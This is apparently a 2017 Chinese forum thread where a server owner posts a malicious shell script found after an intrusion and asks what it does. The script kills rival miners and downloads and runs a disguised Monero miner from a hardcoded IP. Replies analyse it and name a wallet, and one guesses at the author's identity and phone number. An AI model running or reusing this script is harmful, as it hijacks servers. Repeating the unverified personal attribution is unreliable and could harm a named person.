服务器被入侵了。求大神帮忙看看这脚本啥意思

moker · 发表于 2017-5-22 15:37:32

本帖最后由 moker 于 2017-5-22 15:47 编辑
[ol]

#!/bin/sh

rm -rf /var/tmp/cebjtlbny.conf

rm -rf /var/tmp/qsbfhbjcp.conf

rm -rf /var/tmp/dcdvzfanm.conf

rm -rf /var/tmp/agetty

ps auxf|grep -v grep|grep -v vbwdlkfjm|grep "/tmp/"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "cebjtlbny"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "qsbfhbjcp"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "dcdvzfanm"|awk '{print $2}'|xargs kill -9

ps -fe|grep vbwdlkfjm|grep -v grep

if [ $? -ne 0 ]

then

echo "start process....."

chmod 777 /var/tmp/vbwdlkfjm.conf

rm -rf /var/tmp/vbwdlkfjm.conf

curl -o /var/tmp/vbwdlkfjm.conf http://91.230.47.40/common/kworker.conf

wget -O /var/tmp/vbwdlkfjm.conf http://91.230.47.40/common/kworker.conf

chmod 777 /var/tmp/irqbalance

rm -rf /var/tmp/irqbalance

cat /proc/cpuinfo|grep aes>/dev/null

if [ $? -ne 1 ]

then

curl -o /var/tmp/irqbalance http://91.230.47.40/common/kworker

wget -O /var/tmp/irqbalance http://91.230.47.40/common/kworker

else

curl -o /var/tmp/irqbalance http://91.230.47.40/common/kworker_na

wget -O /var/tmp/irqbalance http://91.230.47.40/common/kworker_na

fi

chmod +x /var/tmp/irqbalance

cd /var/tmp

proc=`grep -c ^processor /proc/cpuinfo`

cores=$((($proc+1)/2))

num=$(($cores*3))

/sbin/sysctl -w vm.nr_hugepages=`$num`

nohup ./irqbalance -c vbwdlkfjm.conf -t `echo $cores` >/dev/null &

else

echo "runing....."

fi

[/ol]复制代码

本人小白，看不懂，求大神指点。另外请问如何查到对方是怎么入侵的呢
另外，无法用netstat 查看端口，没有任何提示就是无回显

cs10086qq · 发表于 2017-5-22 15:39:23

yc022t大概的意思是在指定的网址下载木马吧？

总是吵架的猪 · 发表于 2017-5-22 15:44:11

本帖最后由总是吵架的猪于 2017-5-22 15:50 编辑

研究了一下这个是挖矿的估计用你的服务挖比特币的奶奶的

moker · 发表于 2017-5-22 15:51:56

总是吵架的猪发表于 2017-5-22 15:44

研究了一下这个是挖矿的估计用你的服务挖比特币的奶奶的
这是那个配置文件里的，意思是木马上线的地址和帐户吗

moker · 发表于 2017-5-22 15:44:00

总是吵架的猪发表于 2017-5-22 15:44

研究了一下这个是挖矿的估计用你的服务挖比特币的奶奶的
大神，怎么看出来的，求指点

0000000 · 发表于 2017-5-22 15:53:00

本帖最后由 0000000 于 2017-5-22 16:21 编辑

下载的一个后门连接到指定HTTP jsonRPC地址收指令  本地不做监听的
指令地址: pool.minexmr.com
此后门挺全面集成了Curl http Sock5 ldap Tftp  奇葩的是这东西还自带比特币挖矿功能!!!.(https://github.com/pooler/cpuminer)

目测作者是英国人机房用了OVH法国  可以给作者打个电话试试: (+44.7545733224) ALEXIS ENSTON

moker · 发表于 2017-5-22 15:44:00

0000000 发表于 2017-5-22 15:56

下载的一个后门连接到指定HTTP jsonRPC地址收指令本地不做监听的
无法用netstat 查看端口，没有任何提示就是无回显，这个怎么搞呢

0000000 · 发表于 2017-5-22 15:56:48

nohup ./irqbalance -c vbwdlkfjm.conf -t `echo $cores` >/dev/null &

>/dev/null 这个不要就有日志了

deepflow · 发表于 2017-5-22 16:10:48

用你的服务器挖矿挖的门罗币
http://www.minexmr.com/ 底下输入43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R 可以查到他的挖矿历史记录
到现在一共才挖了72.6个按现在市价大约1.8w RMB的样子yc010t看大佬们的评论长见识了

嘉靖 · 发表于 2017-5-22 15:56:00

楼主备份数据重装系统吧，根据描述系统文件已经被替换，以前见过类似的病毒。

		自动登录	找回密码
密码			立即注册

服务器被入侵了。求大神帮忙看看这脚本啥意思

浏览过的版块